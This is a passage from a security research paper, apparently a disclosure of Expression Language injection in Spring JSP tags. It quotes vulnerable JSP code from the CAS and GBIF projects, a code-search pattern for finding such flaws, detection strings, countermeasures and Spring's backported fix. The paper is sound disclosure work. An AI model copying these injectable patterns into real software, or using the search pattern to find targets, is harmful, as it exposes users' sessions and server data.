  • 15.
  • 16. 5. Open Source Examples A simple Google Code Search query shows that this problem is indeed found in the wild [10]. One of the first results returned from our simple search is from a software package called CAS, an enterprise single-sign on utility. The logout page contains a simple EL Injection vulnerability [11]: <c:if test="${not empty param['url']}"> <p> <spring:message code="screen.logout.redirect" arguments="${param['url']}"/> </p> </c:if> Here the “code” attribute will be used to look up a server-side property file message, and the request parameter “url” will be substituted into it as part of the message. Any valid EL will be evaluated and substituted into the message returned to the user instead of the user-provided value. Another simple example is from GBIF, a worldwide scientific data collection tool. The login JSP exhibits a similar weakness [12]: <spring:message code="${param['message']}" text=""/>
  • 17. 6. Countermeasures As described in Expression Language documentation [1] developers may be tempted to add the following code in JSP to prevent EL Injection attacks <%@ page isELIgnored ="true" %> Unfortunately, this will have the effect of blocking the interpretation of the EL code found in other tags, resulting in incongruities between Spring and other taglibs. In fact, while it will block the double evaluation problem in Spring taglib, only allowing the first pass evaluation, it will also stop the first pass in legitimate cases and very well may cause breakage. A more effective approach may be to perform data validation best practice against untrusted input and to ensure that output encoding is applied when data arrives on the EL layer, so that no metacharacter is found by the interpreter within the user content before evaluation. The most obvious patterns to detect include “${“ and “#{“, but it may be possible to encode or fragment this data. Finally, SpringSource received an advance copy of this paper and reacted positively, backporting a fix to all previous vulnerable versions. A description of the fix from their release is quoted here at length: A new context parameter has been added called springJspExpressionSupport. When true (the default) the existing behaviour of evaluating EL within the tag will be performed. When running in an environment where EL support is provided by the container, this should be set to false. Note that for Spring Framework 3.1 onwards when running on a Servlet 3.0 or higher container, the correct default will be set automatically. This new attribute is available in: ○ 3.0.6 onwards ○ 2.5.6.SEC03 onwards (community releases) ○ 2.5.7.SR02 (subscription customers)
  • 18. 7. Conclusions Expression Language Injection occurs when user input is evaluated by a J2EE server’s Expression Language resolvers, and a common opportunity for this vulnerability to occur today is with the usage of Spring JSP tags. The impacts of this attack range from a simple HttpOnly bypass to a server-side information leakage technique. This information leakage will differ in severity mostly based on what J2EE technologies are in use and what is in scope of the vulnerable code. One of the most dangerous abuse scenarios involves an attacker controlled page inferring a user’s session ID on a browser that’s currently logged into the vulnerable application. It’s also been shown that this problem exists in the wild and custom countermeasures can be undertaken, but a fix to the framework itself is available at the time of this paper’s release.
  • 19. 8. References [1] The J2EE 1.4 Tutorial. Expression Language. http://download.oracle.com/javaee/1.4/tutorial/ doc/JSPIntro7.html [2] Expression Language Specification. A component of the JavaServer™ Pages Specification. http://jsp.java.net/spec/jsp-2_1-fr-spec-el.pdf [3] A JSTL primer, Part 1: The expression language. Implicit Objects. http://www.ibm.com/developerworks/java/library/j-jstl0211/index.html#N10147 [4] Unified Expression Language. Resolving Expressions. http://download.oracle.com/javaee/5/tutorial/doc/bnahq.html#bnaif [5] oOo.nu. CVE-2010-1870: Struts2/XWork Remote Command Execution. http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html [6] Google Codesearch. (Search for ImplicitFlowVariableELResolver.java). esearch#VuIw2vEquuM/spring-webflow/trunk/spring-webflow/src/main/java/org/ springframework/webflow/expression/el/ImplicitFlowVariableELResolver.javahttp://google.com/ cod [7] Google Codesearch. (Search for ApplicationContextFilter.java). http://google.com/codesearch#coOE0tRomSs/trunk/activemq-web-console/src/main/java/org/ apache/activemq/web/filter/ApplicationContextFilter.java [8] Spring Framework Documentation. Chapter 6: Spring Faces. http://static.springsource.org/spring-webflow/docs/2.0-m1/reference/spring-faces.html [9] Google Codesearch. (Spring tags’ usage of EL). http://google.com/codesearch#0CkyFaECr-A/trunk/botnodetoolkit/src/thirdparty/ spring/org/springframework/web/util/ ExpressionEvaluationUtils.java&q=file:ExpressionEvaluationUtils%5C.java&type=cs&l=131 [10] Google Codesearch. (Simple Search for EL injection vulnerabilities). http://google.com/codesearch search for file:.jsp <spring:[^>]*".*${[^}]*param [11] Google Codesearch. (CAS casLogoutView.jsp). http://google.com/codesearch#OLuu2DUNjD0/downloads/cas/cas-server-3.0.7- rc1.tar.gz%7CZO1XDTgQolk/cas-server-3.0.7-rc1/webapp/WEB-INF/view/jsp/default/ui/ casLogoutView.jsp&q=file:%5C.jsp%20%3Cspring:.*%5C$%5C%7Bparam [12] Google Codesearch. (GBIF login.jsp).
  • 20. http://google.com/codesearch#-u99BboDzf8/trunk/portal-web/src/main/webapp/WEB-INF/jsp/ admin/login.jsp&q=file:%5C.jsp%20%3Cspring:.*%5C$%5C%7Bparam&type=cs [13] Spring Framework Documentation. MessageTag properties (note the “el-support” field). http://static.springsource.org/spring/docs/1.2.x/taglib/tag/MessageTag.html [14] Ounce Labs. Two Security Vulnerabilities in the Spring Framework’s MVC. Berg, R., Cruz, D http://o2platform.files.wordpress.com/2011/07/ounce_springframework_vulnerabilities.pdf. [15] Live Example of Inferring User’s Secrets via Cross Domain Requests http://www.wisec.it/spring/springopt.html. [16] Live Example of EL Injection Demo Page http://68.169.49.40:18080/ELInjection/demo.htm [17] Clickjacking, definition http://en.wikipedia.org/wiki/Clickjacking
  • 21. 9. Authors Stefano Di Paola is the CTO and a co-founder of Minded Security, where he is responsible for the Research and Development Lab. Prior to founding Minded Security, Stefano was a freelance security consultant, working for several private, public companies and the University of Florence at the Faculty of Computer Engineering. He has contributed to several sections of the OWASP testing guide and is also the Research & Development Director of OWASP Italian Chapter. Arshan Dabirsiaghi is the Director of Research at Aspect Security, an application security service provider.